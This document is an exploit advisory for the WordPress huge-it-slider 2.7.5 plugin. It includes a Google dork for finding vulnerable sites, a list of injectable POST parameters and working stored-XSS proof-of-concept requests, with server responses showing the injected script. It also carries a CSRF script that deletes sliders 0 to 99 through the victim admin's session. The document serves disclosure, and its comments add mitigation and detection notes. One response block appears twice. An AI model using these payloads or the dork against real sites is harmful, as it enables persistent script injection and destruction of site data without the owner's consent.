# Exploit Title: WordPress huge-it-slider 2.7.5 - Persistent JS/HTML Code Injection, Arbitrary Slider Deletion
# Date: 2015-06-23
# Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/"
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/slider-image.latest-stable.zip
# Version: 2.7.5
# Tested on: windows 7 ultimate + Firefox.
# video demo: https://www.youtube.com/watch?v=RTLAbmyBIU8
====================================================
* CSRF + Persistent JS/HTML Injection
====================================================
=====================
DESCRIPTION
=====================
An attacker can lure a user who has editing privileges onto a page containing a malicious script,
which then submits the parameters below with injected JavaScript that is stored in the database.
============================
vulnerable POST parameters
============================
//parameters whose names include a variation number//
order_by_[variation_number]
titleimage[variation_number]
sl_url[variation_number]
sl_link_target[variation_number]
im_description[variation_number]
imagess[variation_number]
//parameters with fixed names//
sl_pausetime
sl_changespeed
===============
EXPLOITATION
===============
The variation numbers can be extracted from a published page containing the slider, and all of the
parameters above can then be injected with JS/HTML code.
-------------------
EXAMPLE
-------------------
[Extracting data for use]
On a vulnerable site that has a published slider, the malicious user can extract the information
needed for the attack to succeed.
-----------------------------------------------------------------------------------------
[variation_number] is a per-image number that can be extracted as follows.
-----------------------------------------------------------------------------------------
The attacker sees the following fragment of the source code of the page with the slider:
<!-- ##########################DOTS######################### -->
<div class="huge_it_slideshow_dots_container_2"> [ <---SLIDER_ID_FOUND=2 ]
<div class="huge_it_slideshow_dots_thumbnails_2">
<div id="huge_it_dots_0_1" class="huge_it_slideshow_dots_1 huge_it_slideshow_dots_active_1"
onclick="huge_it_change_image_1(parseInt(jQuery('#huge_it_current_image_key_1').val()), '0', data_1,false,true);
return false;"
image_id="14" [ <---ITS_VARIATION_NUMBER!!! ]
image_key="0"></div>
</div>
<a id="huge_it_slideshow_left_1" href="#" >
<div id="huge_it_slideshow_left-ico_1">
<div><i class="huge_it_slideshow_prev_btn_1 fa"></i></div></div>
</a>
<a id="huge_it_slideshow_right_1" href="#" >
<div id="huge_it_slideshow_right-ico_1 , data_1">
<div><i class="huge_it_slideshow_next_btn_1 fa"></i></div></div>
</a>
</div>
<!-- ##########################IMAGES######################### -->
-----------------------------------------------------------------------------------
The class names of the [<div>] tags end with a number, which is the id of the slider.
The [<div id="huge_it_dots_...">] tag also carries an [image_id] attribute, which is the
variation number used in the names of the vulnerable POST parameters.
============================================
POC [DATA RELATING TO THE ABOVE]
============================================
------------ SLIDER_ID
URL REQUEST |
------------
http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&id=2&task=apply
--------
POSTDATA
--------
name=i0akiN-SEC&order_by_14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&imagess14=&
titleimage14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_url14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_link_target14=&
sl_pausetime=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_changespeed=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
im_description14=as%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fi0akiN_HACK%2F%29%3B%3C%2Fscript%3E&
imagess14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_width=500&
sl_height=300&pause_on_hover=off&slider_effects_list=cubeH&sl_position=center&task=
--------------------
RESPONSE ADMIN PAGE
--------------------
...
<input class="order_by" type="hidden" name="order_by_14" value="0" />
<div class="image-container">
<img src="" onmouseover=alert(/i0akiN_hack/) a="" />
<div>
<script>
... </script>
<input type="hidden" name="imagess14" id="_unique_name14" value="" onmouseover=alert(/i0akiN_hack/) a="" />
<span class="wp-media-buttons-icon"></span>
<div class="huge-it-editnewuploader uploader button14 add-new-image">
<input type="button" class="button14 wp-media-buttons-icon editimageicon" name="_unique_name_button14" id="_unique_name_button14" value="Edit image" />
</div>
</div>
</div>
<div class="image-options">
<div>
<label for="titleimage14">Title:</label>
<input class="text_area" type="text" id="titleimage14" name="titleimage14" id="titleimage14" value="" onmouseover=alert(/i0akiN_hack/) a="">
</div>
<div class="description-block">
<label for="im_description14">Description:</label>
<textarea id="im_description14" name="im_description14" >as</textarea><script>alert(/i0akiN_HACK/);</script></textarea>
</div>
<div class="link-block">
<label for="sl_url14">URL:</label>
<input class="text_area url-input" type="text" id="sl_url14" name="sl_url14" value="" onmouseover=alert(/i0akiN_hack/) a="" >
<label class="long" for="sl_link_target14">Open in new tab</label>
<input type="hidden" name="sl_link_target14" value="" />
<input class="link_target" type="checkbox" id="sl_link_target14" name="sl_link_target14" />
</div>
<div class="remove-image-container">
<a class="button remove-image" href="admin.php?page=sliders_huge_it_slider&id=2&task=apply&removeslide=14">Remove Image</a>
</div>
</div>
<div class="clear"></div>
</li>
</ul>
</div>
</div>
<div id="postbox-container-1" class="postbox-container">
<div id="side-sortables" class="meta-box-sortables ui-sortable">
<div id="slider-unique-options" class="postbox">
...
<li>
<label for="sl_pausetime">Pause time</label>
<input type="text" name="sl_pausetime" id="sl_pausetime" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
<li>
<label for="sl_changespeed">Change speed</label>
<input type="text" name="sl_changespeed" id="sl_changespeed" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as</textarea>
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESSFUL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as</textarea><script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as</textarea>
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESSFUL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as</textarea><script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
====================================
* CSRF & ARBITRARY SLIDER DELETION
====================================
=====================
POC
=====================
//delete first 100 sliders
<script>
// Issues one GET to the plugin's admin page with task=remove_cat for the given slider id.
// Root cause, from the defender's side: a state-changing action is reachable through a
// plain GET and the request carries no nonce parameter, so the server cannot tell a
// cross-site request from a genuine admin click. Mitigation in the plugin: verify a
// nonce (check_admin_referer / _wpnonce) and the user's capability before deleting,
// and perform the deletion on POST rather than GET.
// Detection hint: admin.php requests with task=remove_cat, no _wpnonce, and a foreign
// Referer/Origin are a strong signal of this CSRF in web-server logs.
function sendData( id_slider ){
var req=new XMLHttpRequest();
// Asynchronous request; only the server-side effect matters to the PoC, the response is not read.
req.open("GET","http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&task=remove_cat&id="+id_slider,true);
// Note: the string "true" is assigned rather than the boolean true; any non-empty string is
// truthy, so the browser still attaches the victim's WordPress session cookies.
req.withCredentials="true";
req.send();
}
// Fires the deletion request for slider ids 0 through 99 without checking which ids exist;
// a server-side nonce and capability check would reject every one of these requests.
for(var i=0;i<100;i++){
sendData( i );
}
</script>
No anti-CSRF token (nonce) check was found on the slider deletion request.